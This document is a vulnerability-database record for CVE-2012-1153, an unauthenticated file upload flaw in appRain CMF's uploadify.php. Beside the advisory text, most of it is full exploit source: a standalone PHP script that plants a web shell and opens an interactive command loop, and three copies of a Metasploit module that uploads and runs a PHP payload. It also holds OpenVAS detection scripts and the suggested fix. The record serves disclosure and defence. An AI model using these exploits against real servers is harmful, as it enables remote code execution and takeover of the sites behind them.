ID: CVE-2012-1153 | Type: cve | Reporter: cve@mitre.org | Modified: 2017-08-29T01:31:00
Description
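Unrestricted file upload vulnerability in addons/uploadify/uploadify.php in appRain CMF 0.1.5 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the uploads directory. The references collected below show the cause: the upload handler runs without an authentication check and its file-extension check is commented out. The reporter's suggested fix is to require an administrator login at the top of the script, and the newer scanner entry records no vendor solution (solution type WillNotFix), so affected installations should disable or remove the add-on.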
Weakness classification, per http://cwe.mitre.org/data/definitions/434.html: CWE-434, "Unrestricted Upload of File with Dangerous Type".
{"openvas": [{"lastseen": "2017-07-02T21:10:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1153"], "description": "appRain CMF is prone to an arbitrary-file-upload vulnerability because\nthe application fails to adequately sanitize user-supplied input.\n\nAn attacker may leverage this issue to upload arbitrary files to the\naffected server; this can result in arbitrary code execution within\nthe context of the vulnerable application.\n\nappRain CMF 0.1.5 and prior versions are vulnerable.", "modified": "2017-03-23T00:00:00", "published": "2012-01-23T00:00:00", "id": "OPENVAS:103395", "href": "http://plugins.openvas.org/nasl.php?oid=103395", "type": "openvas", "title": "appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apprain_51576.nasl 5700 2017-03-23 16:03:37Z cfi $\n#\n# appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"appRain CMF is prone to an arbitrary-file-upload vulnerability because\nthe application fails to adequately sanitize user-supplied input.\n\nAn attacker may leverage this issue to upload arbitrary files to the\naffected server; this can result in arbitrary code execution within\nthe context of the vulnerable application.\n\nappRain CMF 0.1.5 and prior versions are vulnerable.\";\n\nif (description)\n{\n script_id(103395);\n script_cve_id(\"CVE-2012-1153\");\n script_bugtraq_id(51576);\n script_version(\"$Revision: 5700 $\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/51576\");\n script_xref(name : \"URL\" , value : \"http://www.apprain.com\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-23 17:03:37 +0100 (Thu, 23 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:04:51 +0100 (Mon, 23 Jan 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n 
\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nforeach dir( make_list_unique( \"/apprain\", \"/cms\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/admin/system\";\n buf = http_get_cache( item:url, port:port );\n\n if( \"Start with appRain\" >< buf ) {\n\n host = http_host_name( port:port );\n file = \"openvas-\" + rand() + \".php\";\n ex =\"<?php phpinfo();?>\";\n len = 110 + strlen(ex);\n\n req = string(\"POST \",dir,\"/webroot/addons/uploadify/uploadify.php HTTP/1.0\\r\\n\",\n\t\t \"Host: \",host,\"\\r\\n\",\n\t\t \"Content-Length: \",len,\"\\r\\n\",\n\t\t \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\",\n\t\t \"Connection: close\\r\\n\",\n\t\t \"\\r\\n\",\n\t\t \"--o0oOo0o\\r\\n\",\n\t\t 'Content-Disposition: form-data; name=\"Filedata\"; filename=\"',file,'\"',\"\\r\\n\",\n\t\t \"\\r\\n\",\n\t\t ex,\"\\r\\n\",\n\t\t \"--o0oOo0o--\\r\\n\\r\\n\");\n result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( file >!< result ) continue;\n\n url = dir + \"/addons/uploadify/uploads/\" + file;\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\" ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-05-08T19:08:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1153"], "description": "appRain CMF is prone to an arbitrary-file-upload vulnerability because\n the application fails to adequately sanitize user-supplied input.", "modified": "2020-05-06T00:00:00", "published": "2012-01-23T00:00:00", "id": "OPENVAS:1361412562310103395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103395", "type": "openvas", "title": "appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103395\");\n script_cve_id(\"CVE-2012-1153\");\n script_bugtraq_id(51576);\n script_version(\"2020-05-06T06:57:16+0000\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/51576\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:04:51 +0100 (Mon, 23 Jan 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n 
script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"appRain CMF is prone to an arbitrary-file-upload vulnerability because\n the application fails to adequately sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to upload arbitrary files to the\n affected server, this can result in arbitrary code execution within\n the context of the vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"appRain CMF 0.1.5 and prior versions are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are\n to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port( default:80 );\nif( ! 
http_can_host_php( port:port ) )\n exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/apprain\", \"/cms\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n buf = http_get_cache( item:dir + \"/admin/system\", port:port );\n\n if( \"Start with appRain\" >< buf ) {\n\n vtstrings = get_vt_strings();\n file = vtstrings[\"lowercase_rand\"] + \".php\";\n ex =\"<?php phpinfo();?>\";\n len = 110 + strlen(ex);\n\n req = string(\"POST \", dir, \"/webroot/addons/uploadify/uploadify.php HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Length: \", len, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\",\n \"Connection: close\\r\\n\",\n \"\\r\\n\",\n \"--o0oOo0o\\r\\n\",\n 'Content-Disposition: form-data; name=\"Filedata\"; filename=\"',file,'\"',\"\\r\\n\",\n \"\\r\\n\",\n ex,\"\\r\\n\",\n \"--o0oOo0o--\\r\\n\\r\\n\");\n result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( file >!< result ) continue;\n\n url = dir + \"/addons/uploadify/uploads/\" + file;\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "description": "File upload vulnerability in appRain (uploadify.php)\n\nVulnerability Type: File Upload", "modified": "2013-04-02T00:00:00", "published": "2012-04-27T00:00:00", "id": "E-127", "href": "", "type": "dsquare", "title": "appRain 0.1.5 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T09:39:02", "description": "appRain CMF <= 0.1.5 (uploadify.php) 
Unrestricted File Upload Exploit. CVE-2012-1153. Webapps exploit for php platform", "published": "2012-01-19T00:00:00", "type": "exploitdb", "title": "appRain CMF <= 0.1.5 uploadify.php Unrestricted File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-01-19T00:00:00", "id": "EDB-ID:18392", "href": "https://www.exploit-db.com/exploits/18392/", "sourceData": "<?php\r\n\r\n/*\r\n ---------------------------------------------------------------------\r\n appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit\r\n ---------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://www.apprain.com/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] vulnerable code in /webroot/addons/uploadify/uploadify.php\r\n \r\n 27. if (!empty($_FILES)) {\r\n 28. $tempFile = $_FILES['Filedata']['tmp_name'];\r\n 29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';\r\n 30. $targetFile = \"uploads/\" . $_FILES['Filedata']['name'];\r\n 31. \r\n 32. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);\r\n 33. // $fileTypes = str_replace(';','|',$fileTypes);\r\n 34. // $typesArray = split('\\|',$fileTypes);\r\n 35. // $fileParts = pathinfo($_FILES['Filedata']['name']);\r\n 36. \r\n 37. // if (in_array($fileParts['extension'],$typesArray)) {\r\n 38. // Uncomment the following line if you want to make the directory if it doesn't exist\r\n 39. // mkdir(str_replace('//','/',$targetPath), 0755, true);\r\n 40. \r\n 41. move_uploaded_file($tempFile,$targetFile);\r\n 42. 
echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);\r\n 43. // } else {\r\n 44. // echo 'Invalid file type.';\r\n 45. // }\r\n 46. }\r\n \r\n Restricted access to this script isn't properly realized, so an attacker might be able to upload\r\n arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.\r\n \r\n [-] Possible bug fix:\r\n \r\n include_once('../../../app.php');\r\n App::__Obj('appRain_Base_Core')->check_admin_login(); \r\n \r\n add this lines of code at the beginning of the script\r\n \r\n [-] Disclosure timeline:\r\n \r\n [19/12/2011] - Vulnerability discovered\r\n [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135\r\n [20/12/2011] - Vendor response and fix suggested \r\n [16/01/2012] - After four weeks still no fix released\r\n [19/01/2012] - Public disclosure\r\n \r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------------+\";\r\nprint \"\\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /apprain-v015/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"sh.php\\\"\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= 
\"--o0oOo0o--\\r\\n\";\r\n\r\n$packet = \"POST {$path}addons/uploadify/uploadify.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nif (!preg_match('/sh.php/', http_send($host, $packet))) die(\"\\n[-] Upload failed!\\n\");\r\n\r\n$packet = \"GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\napprain-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18392/"}, {"lastseen": "2016-02-02T10:43:14", "description": "appRain CMF Arbitrary PHP File Upload Vulnerability. CVE-2012-1153. Webapps exploit for php platform", "published": "2012-05-25T00:00:00", "type": "exploitdb", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-05-25T00:00:00", "id": "EDB-ID:18922", "href": "https://www.exploit-db.com/exploits/18922/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in appRain's Content Management\r\n\t\t\t\tFramework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a\r\n\t\t\t\tmalicious user can upload a file to the uploads/ directory without any\r\n\t\t\t\tauthentication, which results in arbitrary code execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'EgiX', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-1153'],\r\n\t\t\t\t\t['OSVDB', '78473'],\r\n\t\t\t\t\t['EDB', '18392']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['appRain 0.1.5 or less', {}]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jan 19 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploadify.php\"\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and 
res.body.empty?\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tpayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\r\n\r\n\t\tpost_data = \"--o0oOo0o\\r\\n\"\r\n\t\tpost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\"\r\n\t\tpost_data << \"<?php \"\r\n\t\tpost_data << payload.encoded\r\n\t\tpost_data << \" ?>\\r\\n\"\r\n\t\tpost_data << \"--o0oOo0o\\r\\n\"\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploadify.php\",\r\n\t\t\t'ctype' => 'multipart/form-data; boundary=o0oOo0o',\r\n\t\t\t'data' => post_data\r\n\t\t})\r\n\r\n\t\t# If the server returns 200 and the body contains our payload name,\r\n\t\t# we assume we uploaded the malicious file successfully\r\n\t\tif not res or res.code != 200 or res.body !~ /#{payload_name}/\r\n\t\t\tprint_error(\"#{peer} - I don't think the file was uploaded. Abort!\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n\t\t# Execute our payload\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploads/#{payload_name}\"\r\n\t\t})\r\n\r\n\t\t# If we don't get a 200 when we request our malicious payload, we suspect\r\n\t\t# we don't have a shell, either. 
Print the status code for debugging purposes.\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_status(\"#{peer} - Server returns #{res.code.to_s}\")\r\n\t\tend\r\n\tend\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18922/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:22", "description": "", "published": "2012-05-24T00:00:00", "type": "packetstorm", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-05-24T00:00:00", "id": "PACKETSTORM:113001", "href": "https://packetstormsecurity.com/files/113001/appRain-CMF-Arbitrary-PHP-File-Upload-Vulnerability.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in appRain's Content Management \nFramework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a \nmalicious user can upload a file to the uploads/ directory without any \nauthentication, which results in arbitrary code execution. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'EgiX', #Discovery, PoC \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2012-1153'], \n['OSVDB', '78473'], \n['EDB', '18392'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['appRain 0.1.5 or less', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jan 19 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5']) \n], self.class) \nend \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}addons/uploadify/uploadify.php\" \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' \n \npost_data = \"--o0oOo0o\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\" \npost_data << \"<?php \" \npost_data << payload.encoded \npost_data << \" ?>\\r\\n\" \npost_data << \"--o0oOo0o\\r\\n\" \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}addons/uploadify/uploadify.php\", \n'ctype' => 'multipart/form-data; boundary=o0oOo0o', \n'data' => post_data \n}) \n \n# If the server returns 200 and the body contains our payload name, \n# we assume we uploaded the malicious file successfully \nif not res or res.code != 200 or res.body !~ /#{payload_name}/ \nprint_error(\"#{peer} - I don't think the file was uploaded. 
Abort!\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}addons/uploadify/uploads/#{payload_name}\" \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. Print the status code for debugging purposes. \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returns #{res.code.to_s}\") \nend \nend \nend`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113001/apprain_upload_exec.rb.txt"}], "metasploit": [{"lastseen": "2020-10-13T00:37:37", "description": "This module exploits a vulnerability found in appRain's Content Management Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a malicious user can upload a file to the uploads/ directory without any authentication, which results in arbitrary code execution.\n", "published": "2012-05-23T22:50:13", "type": "metasploit", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/APPRAIN_UPLOAD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in appRain's Content Management\n Framework (CMF), version 0.1.5 or less. 
By abusing the uploadify.php file, a\n malicious user can upload a file to the uploads/ directory without any\n authentication, which results in arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'EgiX', #Discovery, PoC\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2012-1153'],\n ['OSVDB', '78473'],\n ['EDB', '18392'],\n ['BID', '51576']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['appRain 0.1.5 or less', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-01-19',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])\n ])\n end\n\n def check\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')\n })\n\n if res and res.code == 200 and res.body.empty?\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n uri = target_uri.path\n\n peer = \"#{rhost}:#{rport}\"\n payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\n\n post_data = \"--o0oOo0o\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\"\n post_data << \"<?php \"\n post_data << payload.encoded\n post_data << \" ?>\\r\\n\"\n post_data << \"--o0oOo0o\\r\\n\"\n\n print_status(\"Sending PHP payload (#{payload_name})\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"addons/uploadify/uploadify.php\"),\n 'ctype' => 'multipart/form-data; boundary=o0oOo0o',\n 'data' => post_data\n })\n\n # If the server returns 200 and the body contains our payload name,\n # we assume we uploaded the malicious file successfully\n if not res or res.code != 200 or res.body !~ 
/#{payload_name}/\n print_error(\"File wasn't uploaded, aborting!\")\n return\n end\n\n print_status(\"Executing PHP payload (#{payload_name})\")\n # Execute our payload\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, \"addons/uploadify/uploads/#{payload_name}\")\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either. Print the status code for debugging purposes.\n if res and res.code != 200\n print_status(\"Server returned #{res.code.to_s}\")\n end\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apprain_upload_exec.rb"}]}